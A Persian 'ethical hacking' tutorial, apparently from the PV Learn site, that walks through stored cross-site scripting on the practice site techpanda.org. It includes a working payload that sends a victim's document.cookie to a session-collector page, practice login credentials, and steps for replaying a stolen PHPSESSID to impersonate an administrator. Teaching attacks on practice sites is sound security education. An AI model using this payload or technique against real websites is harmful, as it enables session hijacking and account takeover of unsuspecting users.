مقدمه
درود بر شما عزیزان و کاربران سایت پی وی لرن. با آموزش رایگان هک قانونمند در خدمتتون هستیم.
از جلسه ی قبل آموزش روش هک کردن یک وبسایت رو آغاز نمودیم. توضیحات مربوط به حملات به وبسایت ها و راه های جلوگیری از آن بیان شد. در قسمت دوم روش هک کردن یک وبسایت رو به صورت یک فعالیت هک عملی خواهیم داشت. با این قسمت از آموزش نیز با ما همراه باشید.
روش هک کردن وبسایت ها
تهدیدات رایج برنامه های وب شامل حملات SQL Injection که هدفش بایپس الگوریتم های ورود، خرابکاری داده ها، حملات Denial of Service که شامل قطع دسترسی کاربران مجاز به منابع، Cross Site Scripting XSS که موضوع فعالیت هک ما در این قسمت است و هدفش تزریق کد است. حمله ی Cookie/Session Poisoning باعث دسترسی غیرمجاز می شود.Form Tampering هدف این حمله این است که داده های فرم مانند قیمت ها در برنامه های تجارت الکترونیک را تغییر دهد تا مهاجم بتواند اقلام را با قیمت های پایین دریافت کند. در حمله ی Code Injection کد هایی مانند PHP، Python و غیره تزریق و اطلاعات حساس را افشا می کند. و در آخر حمله ی Defacement که صفحه را در یک وبسایت تغییر می دهد و تمام درخواست های کاربران را صفحه ای که حاوی پیام مهاجم است، هدایت می کند.
کاربران عزیز برای درک بیش تر مباحث روش هک کردن یک وبسایت و توضیحات بیش تر در مورد حملات توصیه می شود مطالب بیان شده در جلسه ی قبل رو نیز مرور نمایید.
فعالیت هک: هک یک وب سایت
در این سناریو عملی، به ربودن نشست کاربر از برنامه های وب واقع در www.techpanda.org می پردازیم. ما از اسکریپت های متقابل سایت برای خواندن شناسه ی نشست کوکی ها استفاده خواهیم کرد و سپس از آن برای جعل نشست کاربر مجاز استفاده می کنیم.
فرض بر این است که مهاجم به برنامه وب دسترسی دارد و می خواهد جلسات کاربران دیگر که از یک برنامه کاربردی مشابه استفاده می کنند را بردارد. هدف این حمله می تواند به دست آوردن دسترسی مدیر به برنامه وب باشد، فرض بر این است که دسترسی مهاجم محدود است.
شروع کنید.
- /http://www.techpanda.org را باز کنید.
- با هدف تمرین، به شدت توصیه می شود دسترسی با استفاده از SQL Injection را داشته باشید.
- ایمیل ورود به سیستم admin@google.com است، رمز عبور Password2010 می باشد.
- اگر شما با موفقیت وارد سیستم شده اید، داشبورد زیر را دریافت خواهید کرد.
روش هک کردن یک وبسایت
- روی Add New Contact کلیک کنید.
- عبارت زیر را به عنوان نام اول وارد کنید.
<a href=# onclick=\”document.location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\”>Dark</a>
در این جا
کد بالا از JavaScript استفاده می کند. این یک لینک با یک رویداد onclick می افزاید. هنگامی که کاربر لینک را کلیک می کند، این رویداد ID جلسه ی کوکی PHP را بازیابی می کند و آن را به صفحه snatch_sess_id.php همراه با ID جلسه در URL می فرستد.
روش هک کردن وبسایت
- جزئیات باقیمانده را که در زیر نشان داده شده وارد کنید.
- روی Save Changes کلیک کنید.
روش هک کردن وبسایت – Save Changes
- داشبورد شما در حال حاضر مانند صفحه زیر ظاهر خواهد شد.
روش هک کردن وبسایت
- از آن جا که کد cross site script در پایگاه داده ذخیره می شود، هر بار که کاربران با لاگین صحیح دسترسی پیدا می کنند، آن ها بارگذاری خواهند شد.
- بیایید فرض کنیم که مدیر لاگین شده و بر روی لینک که Dark کلیک می کند.
- او پنجره را با آی دی جلسه ی نشان داده شده در URL خواهد گرفت.
روش هک کردن وبسایت
توجه: اسکریپت می تواند مقدار را به یک سرور از راه دور که PHPSESSID در آن ذخیره شده است ارسال کند و سپس کاربر به وب سایت هدایت می شود، در صورتی که هیچ چیز اتفاق نیفتاده باشد.
توجه: مقداری که شما خواهید دید می تواند متفاوت از مقدار در این آموزش باشد، اما مفهوم یکسان است.
جعل جلسه با استفاده از فایرفاکس و Tamper Data add-on
نمودار فلوچارت زیر مراحلی را که باید برای تکمیل این تمرین انجام دهید نشان می دهد.
روش هک کردن وبسایت – جعل جلسه با استفاده از فایرفاکس و Tamper Data add-on
- به مرورگر وب فایرفاکس برای این بخش نیاز دارید و همچنین به افزونه Tamper Data نیاز خواهید داشت.
- فایرفاکس را باز کنید و افزونه را همان طور که در نمودار زیر نشان داده شده نصب کنید.
روش هک کردن وبسایت
روش هک کردن وبسایت
- برای tamper data جستجو کنید سپس روی install کلیک کنید، همان طور که در بالا نشان داده شده است.
روش هک کردن وبسایت
- بر روی …Accept and Install کلیک کنید.
روش هک کردن وبسایت
روش هک کردن وبسایت
- اکنون Restart را کلیک کنید.
- اگر نشان داده نشد، نوار منو را در فایرفاکس فعال کنید.
روش هک کردن وبسایت
- روی منوی tools کلیک کنید سپس Tamper Data را مانند شکل نشان داده شده در زیر انتخاب کنید.
روش هک کردن وبسایت
- شما پنجره زیر را دریافت خواهید کرد. توجه: اگر پنجره خالی نیست، دکمه clear را فشار دهید.
روش هک کردن وبسایت
- بر روی Start Manper کلیک کنید.
- به مرورگر وب فایرفاکس بروید، http://www.techpanda.org/dashboard.php را تایپ کنید و سپس کلید enter را برای بارگذاری صفحه فشار دهید.
- شما از pop up را از Tamper Data دریافت خواهید کرد.
روش هک کردن وبسایت – گزینه های پنجره pop up
- پنجره pop up دارای سه (۳) گزینه است. گزینه Tamper به شما اجازه می دهد اطلاعات هدر HTTP را قبل از ارسال آن به سرور تغییر دهید.
- روی آن کلیک کنید.
- شما پنجره زیر را دریافت خواهید کرد.
روش هک کردن یک وبسایت
- ID نشست PHP را که از حمله URL کپی کرده اید کپی کنید و پس از علامت برابر آن را paste کنید. مقدار شما اکنون باید این گونه باشد.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- روی دکمه OK کلیک کنید.
- پنجره Tamper data popupرا دوباره دریافت خواهید کرد.
روش هک کردن یک وبسایت – کلیک روی دکمه submit
- علامت تأیید صحت Continue Tampering را انتخاب کنید.
- زمانی که انجام شد روی دکمه submit کلیک کنید.
- شما باید قادر به دیدن داشبورد همان طور که در شکل زیر نشان داده شده است، باشید.
روش هک کردن یک وبسایت
توجه: ما لاگین نکردیم، فقط یک جلسه لاگین به سیستم را با استفاده از مقدار PHPSESSID که با استفاده از cross site scripting بازیابی کردیم، جعل نمودیم.
خلاصه ی مطالب
یک برنامه وب مبتنی بر مدل سرور-مشتری است. طرف سرویس دهنده از مرورگر وب برای دسترسی به منابع در سرور استفاده می کند.
برنامه های کاربردی وب معمولا در اینترنت قابل دسترس هستند. این باعث می شود که آن ها نسبت به حملات آسیب پذیر باشند.
تهدیدات وب برنامه شامل تزریق SQL، تزریق کد، XSS، اختلال، مسمومیت کوکی، و غیره می باشد.
سیاست امنیتی خوب در هنگام توسعه برنامه های کاربردی وب می تواند به آن ها کمک کند.
کلام پایانی
دوستان گرامی روش هک کردن یک وبسایت رو در دو جلسه توضیح دادیم. در این بخش یک وبسایت رو با روش حمله ی Cross Site Scripting XSS هک نمودیم. همون طور که می دونید هدف این حمله می تواند تزریق کد باشد و همچنین می تواند بر روی مرورگر وب کلاینت اجرا شود. در جلسه ی بعد از سری آموزش های هک قانونمند از سایت آموزشی پی وی لرن با تزریق SQL همراه با مثالی عملی آشنا خواهیم شد. امیدوارم مبحث آموزشی روش هک کردن یک وبسایت مفید بوده و استفاده ی لازم رو از اون برده باشین.
فروشگاه
فیلم های آموزشی
کتاب های آموزشی
مقالات آموزشی
وردپرس
ali
ایمیلی که برای ورود گفتید و رمز را من کپی کردم ولی باز نشد لطفا راهنماییم کیند
ali
مشکل حل شد ممنون
ناشناس
آیا شما سایت هکمیکنید؟
پی وی لرن
با سلام
خیر